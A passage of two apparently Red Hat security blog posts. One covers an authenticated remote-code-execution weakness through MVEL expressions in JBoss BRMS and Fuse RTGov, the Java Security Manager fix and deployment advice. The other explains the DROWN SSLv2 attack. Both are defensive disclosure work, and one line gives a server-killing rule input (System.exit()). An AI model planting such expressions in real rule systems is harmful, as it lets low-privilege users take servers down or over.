    Another example of a simplified language based on Java is MVEL. MVEL is an expression language, mostly used for making basic logic available in application-specific languages and configuration files, such as XML. It's not intended for some serious object-oriented programming, but mainly simple expressions as in "user.getManager().getName() != null". However simple, MVEL is still very powerful and allows the use of any Java APIs available to the developer; its strength is its simplified syntax which doesn’t restrict the ability to call any code the developer may need access to.

    Yet another example of a Java-based application-specific language is the Drools rules language. It is used in JBoss BRMS, a middleware product that implements Business Rules, and its open source counterpart Drools. There is a similar idea behind the Drools language: to hide all the clutter of Java from the rules developer and provide a framework that makes it easy to concentrate on the task at hand (namely: writing business rules) without compromising the ability to call any custom Java code that might be needed to properly implement the organisation's business logic.

    Developers of Java middleware products, starting with application servers and continuing to more complex application frameworks, traditionally invest a great deal of effort into making their products secure. This includes: separating the product’s functionality into several areas with different levels of risk; applying user roles to each of these areas; authorization and authentication of users; audit of the available functionality to evaluate the risk of using this functionality for unintended tasks that could potentially lead to compromises, etc. In this context it is important to understand that the same rich feature set and versatility that makes Java so attractive as a developer platform also becomes its Achilles heel when it comes to security: every so often one of these features finds its way into some method of unintended use or another.

    In this article I will look at one such case where a very flexible feature was added to one of the middleware products that was later discovered to include unsafe consequences, and the methods used to patch it.

    JBoss BRMS, mentioned above, had a role-based security model from the very beginning. Certain roles would allow deployment of new rules and certain development processes would normally be established to allow proper code review prior to deployment. These combined together would ensure that only safe code is ever deployed on the server.

    This changed in BRMS (and BPMS) 6. A new WYSIWYG tool was introduced that allowed for constructing the rules graphically in a browser session, and testing them right away. So any person with rule authoring permissions (role known as "analyst" rather than "admin") would be able to do this. The Drools rules would allow writing arbitrary MVEL expressions, that in turn allow any calls to any Java classes deployed on the application server without restrictions, including the system ones. As an example, an analyst would be able to write System.exit() in a rule and testing this rule would shut down the server. Basically, the graphical rule editor allowed authenticated arbitrary code execution for non-admin users.

    A similar problem existed in JBoss Fuse Service Works 6. While the Drools engine that ships with it does not come with any graphical tool to author rules, so the rules must be deployed on the server as before, it comes with the RTGov component that has some MVEL interfaces exposed. Sending an RTGov request with an MVEL expression in it would again allow authenticated arbitrary code execution for any user that has RTGov permissions.

    This behaviour was caught early on in the development cycle for BxMS/FSW version 6, and a fix was implemented. The fix involves running the application server with Java Security Manager (JSM) turned on, and enabling specific security policies for user-provided code. After the fix was applied, only a limited number of Java instructions were allowed to be used inside user-provided expressions, which were safe for use in legitimate Drools rules and RTGov interfaces, and the specific RCE (Remote Code Execution) vulnerability was considered solved. Essentially a similar security approach was taken as for running Java applets in a sandbox within a browser, where an applet can only use a safe subset of the Java library.

    Some side-effects were detected when products went into testing with the fix applied and performance regression was executed. It was discovered that certain tests ran significantly slower with JSM enabled than on an unsecured machine. This slowdown was significant only in those tests that took into account only the raw performance of rules, not “real-world” scenarios, since any kind of database access would slow down the overall performance anyway, much more significantly than enabling the JSM. However, certain guidelines were developed in order to help customers achieve the best possible balance of speed and security.

    When deploying BRMS/BPMS on a high-performance production server, it is possible to disable JSM, but at the same time not to allow any "analyst"-role users to use these systems for rule development. It is recommended to use these servers for running the rules and applications developed separately and achieving maximum performance, while eliminating the vulnerability by disabling the whole attack vector by disallowing the rule development altogether.

    When BRMS is deployed on development servers used by rule developers and analysts, it is suggested to run these servers with JSM enabled. Since these are not production servers, they do not require mission critical performance in processing real-time customer data, as they are only used for application and rule development. As such, the overhead of the JSM is not noticeable on a non mission-critical server and it is a fair trade-off for a tighter security model.

    When a server is deployed in a "BRMS-as-a-service" configuration, or in other words when rule development is exposed to customers over the Web (even through a VPN-protected Extranet), enabling the complete JSM protection is the recommended approach, accepting the JSM overhead. Without it, any customer with minimal "rule writing and testing" privileges can completely take over the server (and any other co-hosted customers' data as well), a very undesirable situation to avoid.

    Similar solutions are recommended for FSW. Since only RTGov exposes the weakness, it is recommended to run RTGov as a separate server with JSM enabled. For high performance production servers, it is recommended not to install or enable the RTGov component, which eliminates the risk of exposure of user-provided code-based attack vectors, making it possible to run them without JSM at full speed.

    This kind of concern is not specific to JBoss products but is a generic problem potentially affecting any middleware system. Any time rich functionality is made available to users, some of it may be used for malicious purpose. Red Hat takes security of the customers very seriously and every effort is made not only to provide the customers with the richest functionality, but also making sure this functionality is safe to use and proper safe usage guidelines are available.

    Posted: 2016-03-23T13:30:00+00:00
  • Go home SSLv2, you’re DROWNing

    Authored by: Mark J. Cox

    The SSLv2 protocol had its 21st birthday last month, but it’s no cause to celebrate with an alcohol beverage, since the protocol was already deprecated when it turned 18.

    Announced today is an attack called DROWN that takes advantage of systems still using SSLv2.

    Many cryptographic libraries already disable SSLv2 by default, and updates from the OpenSSL project and Red Hat today catch up.

    What is DROWN?

    CVE-2016-0800, also known as DROWN, stands for Decrypting RSA using Obsolete and Weakened eNcryption and is a Man-in-the-Middle (MITM) attack against servers running TLS for secure communications.

    This means that if an attacker can intercept and modify network traffic between a client and the host, the attacker could impersonate the server on what is expected to be a secure connection. The attacker could then potentially eavesdrop or modify important information as it is transferred between the server and client.

    Other Man-in-the-Middle attacks have included POODLE and FREAK. The famous OpenSSL Heartbleed issue from April 2014 did not need a Man-in-the-Middle and was therefore a much more severe risk.

    How does it work?

    The DROWN issue is technically complicated, and the ability to attack using it depends on a number of factors described in more detail in the researchers’ whitepaper. In short, the issue uses a protocol issue in SSLv2 as an oracle in order to help break the encryption on other TLS services if a shared RSA key is in use. The issue is actually quite tricky to exploit by itself, but made easier on servers that are not up to date with some previous year-old OpenSSL security updates. They call this “Special DROWN”, as it could allow a real-time Man-in-the-Middle attack.

    Red Hat has a vulnerability article in the Customer Portal which explains the technical attack and the dependencies in more detail.

    How is Red Hat affected?

    OpenSSL is affected by this issue. In Red Hat Enterprise Linux, the cryptographic libraries GnuTLS and NSS are not affected by this issue as they intentionally do not enable SSLv2.

    Customers who are running services that have the SSLv2 protocol enabled could be affected by this issue.

    Red Hat has rated this issue as having Important security severity. A successful attack would need to be able to leverage a number of conditions and require an attacker to be a Man-in-the-Middle.

    Red Hat advises that SSLv2 is a protocol that should no longer be considered safe and should not be used in a modern environment. Red Hat updates for OpenSSL can be found here: https://access.redhat.com/security/cve/cve-2016-0800. The updates cause the SSLv2 protocol to be disabled by default.

    Our OpenSSL updates also include several other lower priority security fixes which are each described in the Errata. Your organization should review those issues as well when assessing risk.

    If you are a Red Hat Insights customer, a test has been added to identify servers affected by this issue.

    What do you need to do?

    If you are unsure of any details surrounding this issue in your environment, you should apply the update and restart services as appropriate. For detailed technical information please see the Red Hat vulnerability article.

    Security protocols don’t turn 21 every day, so let’s turn off SSLv2, raise a glass, and DROWN one’s sorrows. Cheers!

    Posted: 2016-03-01T13:00:00+00:00